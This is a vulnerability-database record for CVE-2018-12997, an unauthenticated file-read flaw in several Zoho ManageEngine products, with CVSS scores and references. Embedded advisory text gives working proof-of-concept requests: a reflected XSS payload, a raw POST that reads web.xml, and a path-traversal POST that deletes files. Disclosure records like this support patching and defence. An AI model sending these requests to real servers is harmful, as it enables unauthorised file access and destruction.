VAR-201806-1163
Vulnerability from variot - Updated: 2023-12-18 12:18Incorrect Access Control in FailOverHelperServlet in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows attackers to read certain files on the web server without login by sending a specially crafted request to the server with the operation=copyfile&fileName= substring. plural Zoho ManageEngine The product contains an information disclosure vulnerability.Information may be obtained. ZOHO ManageEngine Netflow Analyzer, etc. are all products of the American company ZOHO. ZOHO ManageEngine Netflow Analyzer is a set of web-based bandwidth monitoring tools. Network Configuration Manager is a suite of network configuration management, network change and configuration management (NCCM) software for configuring switches, routers, firewalls, and other network devices. FailOverHelperServlet in many ZOHO products has an access control error vulnerability. This issue has been reported to the vendor who has already published patches for this issue. https://www.manageengine.com/products/applications_manager/issues.html
========================== Advisory:Zoho manageengine Applications Manager Reflected XSSVulnerability Author: M3 From DBAppSecurity Affected Version: All ========================== Proof of Concept: ========================== /GraphicalView.do?method=createBusinessService"scriptalert(5045)/script
Notice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue. http://opmanager.helpdocsonline.com/read-me
========================== Advisory:Zoho manageengine Arbitrary File Read in multiple Products Author: M3 From DBAppSecurity Affected Products: Netflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer ========================== Proof of Concept: ========================== POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx
Notice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue.
========================== Advisory: Zoho manageengine Desktop Central Arbitrary File Deletion Author: M3 From DBAppSecurity Affected Products:Desktop Central ========================== Proof of Concept: ==========================
POST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif
Notice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201806-1163",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "firewall analyzer",
"scope": "eq",
"trust": 1.6,
"vendor": "zohocorp",
"version": null
},
{
"model": "manageengine netflow analyzer",
"scope": "eq",
"trust": 1.6,
"vendor": "zohocorp",
"version": null
},
{
"model": "manageengine oputils",
"scope": "eq",
"trust": 1.0,
"vendor": "zohocorp",
"version": null
},
{
"model": "manageengine network configuration manager",
"scope": "eq",
"trust": 1.0,
"vendor": "zohocorp",
"version": null
},
{
"model": "manageengine opmanager",
"scope": "eq",
"trust": 1.0,
"vendor": "zohocorp",
"version": null
},
{
"model": "manageengine firewall analyzer",
"scope": "lt",
"trust": 0.8,
"vendor": "zoho",
"version": "build 123147"
},
{
"model": "manageengine netflow analyzer",
"scope": "lt",
"trust": 0.8,
"vendor": "zoho",
"version": "build 123137"
},
{
"model": "manageengine network configuration manager",
"scope": "lt",
"trust": 0.8,
"vendor": "zoho",
"version": "build 123128"
},
{
"model": "manageengine opmanager",
"scope": "lt",
"trust": 0.8,
"vendor": "zoho",
"version": "build 123148"
},
{
"model": "manageengine oputils",
"scope": "lt",
"trust": 0.8,
"vendor": "zoho",
"version": "build 123161"
},
{
"model": "network configuration manager",
"scope": "eq",
"trust": 0.6,
"vendor": "zohocorp",
"version": null
},
{
"model": "oputils",
"scope": "eq",
"trust": 0.6,
"vendor": "zohocorp",
"version": null
},
{
"model": "opmanager",
"scope": "eq",
"trust": 0.6,
"vendor": "zohocorp",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006784"
},
{
"db": "NVD",
"id": "CVE-2018-12997"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-037"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_opmanager:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_oputils:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_network_configuration_manager:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-12997"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Xiaotian Wang",
"sources": [
{
"db": "PACKETSTORM",
"id": "148635"
}
],
"trust": 0.1
},
"cve": "CVE-2018-12997",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-12997",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-123012",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-12997",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-12997",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201807-037",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-123012",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123012"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006784"
},
{
"db": "NVD",
"id": "CVE-2018-12997"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-037"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Incorrect Access Control in FailOverHelperServlet in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows attackers to read certain files on the web server without login by sending a specially crafted request to the server with the operation=copyfile\u0026fileName= substring. plural Zoho ManageEngine The product contains an information disclosure vulnerability.Information may be obtained. ZOHO ManageEngine Netflow Analyzer, etc. are all products of the American company ZOHO. ZOHO ManageEngine Netflow Analyzer is a set of web-based bandwidth monitoring tools. Network Configuration Manager is a suite of network configuration management, network change and configuration management (NCCM) software for configuring switches, routers, firewalls, and other network devices. FailOverHelperServlet in many ZOHO products has an access control error vulnerability. This issue has been reported to the vendor who has already published patches for this issue. \nhttps://www.manageengine.com/products/applications_manager/issues.html\n\n\n==========================\nAdvisory:Zoho manageengine Applications Manager Reflected XSSVulnerability\nAuthor: M3 From DBAppSecurity\nAffected Version: All\n==========================\nProof of Concept:\n==========================\n/GraphicalView.do?method=createBusinessService\"scriptalert(5045)/script\n\n\nNotice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue. \nhttp://opmanager.helpdocsonline.com/read-me\n\n\n==========================\nAdvisory:Zoho manageengine Arbitrary File Read in multiple Products\nAuthor: M3 From DBAppSecurity\nAffected Products:\nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer\n==========================\nProof of Concept:\n==========================\nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx\n\n\nNotice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue. \n\n\n\n\n==========================\nAdvisory: Zoho manageengine Desktop Central Arbitrary File Deletion\nAuthor: M3 From DBAppSecurity\nAffected Products:Desktop Central\n==========================\nProof of Concept:\n==========================\n\n\nPOST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif\n\n\nNotice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-12997"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006784"
},
{
"db": "VULHUB",
"id": "VHN-123012"
},
{
"db": "PACKETSTORM",
"id": "148635"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-12997",
"trust": 2.6
},
{
"db": "CNNVD",
"id": "CNNVD-201807-037",
"trust": 2.3
},
{
"db": "PACKETSTORM",
"id": "148635",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006784",
"trust": 0.8
},
{
"db": "VULHUB",
"id": "VHN-123012",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123012"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006784"
},
{
"db": "PACKETSTORM",
"id": "148635"
},
{
"db": "NVD",
"id": "CVE-2018-12997"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-037"
}
]
},
"id": "VAR-201806-1163",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-123012"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:18:43.350000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.manageengine.com/"
},
{
"title": "Multiple ZOHO Product access control error vulnerability fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81656"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006784"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-037"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123012"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006784"
},
{
"db": "NVD",
"id": "CVE-2018-12997"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://github.com/unh3x/just4cve/issues/8"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2018/jul/73"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/148635/zoho-manageengine-13-13790-build-xss-file-read-file-deletion.html"
},
{
"trust": 1.7,
"url": "http://www.cnnvd.org.cn/web/xxk/ldxqbyid.tag?cnnvd=cnnvd-201807-037"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12997"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-12997"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12999"
},
{
"trust": 0.1,
"url": "https://www.manageengine.com/products/applications_manager/issues.html"
},
{
"trust": 0.1,
"url": "http://opmanager.helpdocsonline.com/read-me"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12996"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12998"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123012"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006784"
},
{
"db": "PACKETSTORM",
"id": "148635"
},
{
"db": "NVD",
"id": "CVE-2018-12997"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-037"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-123012"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006784"
},
{
"db": "PACKETSTORM",
"id": "148635"
},
{
"db": "NVD",
"id": "CVE-2018-12997"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-037"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-29T00:00:00",
"db": "VULHUB",
"id": "VHN-123012"
},
{
"date": "2018-08-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-006784"
},
{
"date": "2018-07-22T17:22:56",
"db": "PACKETSTORM",
"id": "148635"
},
{
"date": "2018-06-29T12:29:00.437000",
"db": "NVD",
"id": "CVE-2018-12997"
},
{
"date": "2018-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-037"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "VULHUB",
"id": "VHN-123012"
},
{
"date": "2018-08-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-006784"
},
{
"date": "2023-12-07T20:06:40.657000",
"db": "NVD",
"id": "CVE-2018-12997"
},
{
"date": "2021-09-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-037"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-037"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Zoho ManageEngine Information disclosure vulnerability in products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006784"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-037"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…